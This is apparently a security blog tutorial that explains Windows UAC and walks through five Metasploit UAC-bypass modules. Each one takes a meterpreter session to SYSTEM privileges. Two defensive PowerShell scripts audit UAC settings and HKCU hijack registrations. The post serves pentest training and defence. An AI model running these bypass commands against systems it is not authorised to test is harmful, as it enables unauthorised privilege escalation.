Hello friends!! Today we are shedding light on User Account Control, known for short as UAC. We will also look at how it can protect you from malicious software, and how ignoring a UAC prompt can get your system into trouble.
Table of contents
Introduction to UAC
What is UAC?
Working of UAC
5 ways to Bypass UAC
1. Windows Escalate UAC Protection Bypass
2. Windows Escalate UAC Protection Bypass (In Memory Injection)
3. Windows UAC Protection Bypass (Via FodHelper Registry Key)
4. Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
5. Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
Introduction to User Account Control
What is User Account Control?
User Account Control was introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a predictable way that requires minimal effort from the user.
In other words, it is a security feature of Windows that helps prevent unauthorized modifications to the operating system. UAC makes sure that certain changes are made only with authorization from an administrator. If a change is not approved by the administrator, it is not executed and Windows remains unchanged.
How does UAC work?
UAC works by preventing a program from carrying out tasks that involve system-wide changes. These operations will not work unless the process attempting them is running with administrator rights. If you run a program as administrator, it is "elevated" and has more privileges than the programs that are not running as administrator.
Some things which cannot be done without administrator rights:
- Registry modifications (if the registry key is under e.g. HKEY_LOCAL_MACHINE, which affects more than one user, it will be read-only)
- Loading a device driver
- DLL injection
- Modifying the system time (clock)
- Modifying User Account Control settings (via the Registry it can be enabled/disabled, but you need the correct privileges to do this)
- Modifying protected directories (e.g. the Windows folder, Program Files)
- Scheduled tasks (e.g. to auto-start with administrator privileges)
UAC won't automatically block malicious software; its purpose was never to determine whether a program is malicious or not. That is down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation.
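The prompting behaviour described above is controlled by a few registry values, and the Metasploit modules in the next section all depend on the default prompt level, where built-in Windows binaries elevate without asking. The following PowerShell script is an added example, not code from the original post: it reads those policy values from HKLM, reports whether the current PowerShell process is already elevated, and warns when the configuration is one that auto-elevation bypasses rely on. The registry key, value names and their meanings are the documented Windows settings; the function names are my own.

```powershell
# Added example (not part of the original post): audit the registry values that
# control UAC prompting and report whether this process is elevated. Read-only,
# works from a standard (non-elevated) PowerShell session.

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Documented meanings of ConsentPromptBehaviorAdmin (the UAC slider for admins).
$AdminPromptLevels = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop (Always notify)'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (Windows default)'
}

function Get-UacPolicy {
    # A missing value is reported as 0 so that an absent setting is not mistaken
    # for a strong one.
    $p = Get-ItemProperty -LiteralPath $PolicyKey
    [pscustomobject]@{
        EnableLUA                  = [int]$p.EnableLUA
        ConsentPromptBehaviorAdmin = [int]$p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = [int]$p.PromptOnSecureDesktop
    }
}

function Test-IsElevated {
    # True when the current token has the Administrators group enabled, i.e. the
    # process already passed (or never needed) a UAC prompt.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-UacFindings {
    # Returns human-readable warnings about weak UAC settings.
    param([Parameter(Mandatory)] $Policy)
    $findings = @()
    if ($Policy.EnableLUA -ne 1) {
        $findings += 'EnableLUA is not 1: UAC is disabled and every admin process runs elevated silently.'
    }
    if ($Policy.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin is 0: administrators are elevated without any prompt.'
    }
    elseif ($Policy.ConsentPromptBehaviorAdmin -eq 5) {
        $findings += 'ConsentPromptBehaviorAdmin is 5 (default): signed Windows binaries elevate without a prompt, which auto-elevation bypasses depend on. Set it to 2 ("Always notify").'
    }
    if ($Policy.PromptOnSecureDesktop -ne 1) {
        $findings += 'PromptOnSecureDesktop is not 1: the prompt is not isolated on the secure desktop and can be spoofed or automated more easily.'
    }
    $findings
}

$policy = Get-UacPolicy
"Elevated now: $(Test-IsElevated)"
$summary = 'EnableLUA={0}  ConsentPromptBehaviorAdmin={1} ({2})  PromptOnSecureDesktop={3}' -f `
    $policy.EnableLUA, $policy.ConsentPromptBehaviorAdmin,
    $AdminPromptLevels[$policy.ConsentPromptBehaviorAdmin], $policy.PromptOnSecureDesktop
$summary
$warnings = @(Get-UacFindings -Policy $policy)
if ($warnings.Count -eq 0) { 'UAC is configured at a prompting level that asks for every elevation.' }
else { $warnings | ForEach-Object { Write-Warning $_ } }
```

Run it once from a normal prompt and once from an elevated one to see the difference in "Elevated now". The check that matters for the rest of this post is the ConsentPromptBehaviorAdmin value: at 5 the system trusts its own binaries to elevate quietly, and every technique below rides on that trust; at 2 each of them produces a visible prompt instead.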
5 Ways to Bypass UAC
First, exploit the target machine to obtain a meterpreter session. Once you have meterpreter session 1, type the following commands to check the session's authority and privileges.
getsystem
getuid
If you don't have system/admin authority and privileges, then you should go for a bypass of the UAC protection on the targeted system.
Windows Escalate UAC Protection Bypass
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit
From the given image you can observe that meterpreter session 2 has opened; now type the following commands to determine the session's authority and privileges.
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM privilege. Now if you type the "shell" command, you will get access to a command prompt with administrator privilege.
Windows Escalate UAC Protection Bypass (In Memory Injection)
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three separate binaries in the standard technique. However, it requires the correct architecture to be selected (use x64 for SYSWOW64 systems also). If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit
From the given image you can observe that meterpreter session 2 has opened; now type the following commands to determine the session's authority and privileges.
getsystem
getuid
Ultimately you will get NT AUTHORITY\SYSTEM privilege. Now if you run the "shell" command, you will get access to a command prompt with administrator privilege.
Windows UAC Protection Bypass (Via FodHelper Registry Key)
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit
From the given image you can observe that meterpreter session 2 has opened; now type the following commands to determine the session's authority and privileges.
getsystem
getprivs
Great!! Here we got NT AUTHORITY\SYSTEM privilege. Now if you type the "shell" command, you will get access to a command prompt with administrator privilege.
Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit
From the given image you can observe that meterpreter session 2 has opened; now type the following commands to determine the session's authority and privileges.
getsystem
getuid
And again you will get NT AUTHORITY\SYSTEM privilege.
Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high-integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target; therefore, if cmd.exe access is restricted, this module will not run correctly.
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit
From the given image you can observe that meterpreter session 2 has opened; now type the following commands to determine the session's authority and privileges.
getsystem
getuid
Finally you will get NT AUTHORITY\SYSTEM privilege. Now if you again run the "shell" command, you will get access to a command prompt with administrator privilege, and this is how we can use Metasploit's post-exploitation modules to bypass UAC protection.
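The FodHelper, Eventvwr and COM handler modules above share one mechanism: they write entries under the current user's hive, which is writable without any prompt, let a high-integrity Windows process consult those entries, and then delete them again. The following PowerShell script is an added example, not code from the original post or from Metasploit. It enumerates the two kinds of per-user registration those descriptions refer to (an "open" verb command under HKCU\Software\Classes, and a per-user COM InprocServer32 DLL under HKCU\Software\Classes\CLSID) so a defender can review what a profile has registered; the registry layout is standard Windows, while the function names, the output format and the trusted-path heuristic are my own.

```powershell
# Added example (not part of the original post): list per-user class
# registrations in HKCU that a high-integrity process may consult. Read-only;
# run it as the user whose profile you want to inspect.

function Get-HkcuClassRegistrations {
    $classes  = 'Registry::HKEY_CURRENT_USER\Software\Classes'
    $findings = @()
    if (-not (Test-Path -LiteralPath $classes)) { return $findings }

    # 1. Per-user "open" verbs. A fresh profile has almost none of these, so any
    #    whose command points outside the system trees deserves a second look.
    foreach ($key in Get-ChildItem -LiteralPath $classes -ErrorAction SilentlyContinue) {
        $cmdPath = "Registry::$($key.Name)\shell\open\command"
        if (Test-Path -LiteralPath $cmdPath) {
            $props = Get-ItemProperty -LiteralPath $cmdPath
            $findings += [pscustomobject]@{
                Kind            = 'ShellOpenCommand'
                Key             = $cmdPath
                Target          = $props.'(default)'
                DelegateExecute = $props.DelegateExecute
            }
        }
    }

    # 2. Per-user COM servers. HKCU\Software\Classes\CLSID is consulted before HKLM
    #    for the same CLSID, so a user-writable InprocServer32 DLL is the pattern
    #    behind per-user COM handler hijacks.
    $clsidRoot = "$classes\CLSID"
    if (Test-Path -LiteralPath $clsidRoot) {
        foreach ($clsid in Get-ChildItem -LiteralPath $clsidRoot -ErrorAction SilentlyContinue) {
            $inproc = "Registry::$($clsid.Name)\InprocServer32"
            if (Test-Path -LiteralPath $inproc) {
                $findings += [pscustomobject]@{
                    Kind            = 'ComInprocServer'
                    Key             = $inproc
                    Target          = (Get-ItemProperty -LiteralPath $inproc).'(default)'
                    DelegateExecute = $null
                }
            }
        }
    }
    $findings
}

function Test-TargetOutsideSystemPaths {
    # Heuristic (my own, not a Windows rule): handlers installed machine-wide live
    # under the Windows or Program Files trees; anything else (user profile, temp,
    # UNC path) is flagged for review.
    param([string] $Target)
    if ([string]::IsNullOrWhiteSpace($Target)) { return $false }
    $t = [Environment]::ExpandEnvironmentVariables($Target).ToLowerInvariant()
    $trusted = @($env:windir, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.ToLowerInvariant() }
    -not ($trusted | Where-Object { $t.Contains($_) })
}

$results = @(Get-HkcuClassRegistrations)
foreach ($r in $results) {
    $flag = if (Test-TargetOutsideSystemPaths $r.Target) { 'REVIEW' } else { 'ok' }
    '{0,-6} {1,-16} {2}  ->  {3}' -f $flag, $r.Kind, $r.Key, $r.Target
}
"Total per-user registrations: $($results.Count)"
```

Two caveats when reading the output. Per-user installers (Teams, OneDrive and similar) legitimately register handlers here and will show up as REVIEW, so compare against a known-good profile rather than treating every hit as malicious. More importantly, the modules above delete their keys as soon as the payload runs, so a scan like this only catches leftovers from a failed or interrupted attempt; to see the write itself you need registry auditing that records the event when it happens, such as Sysmon's registry events (IDs 12 and 13) on key creation and value writes under HKCU\Software\Classes.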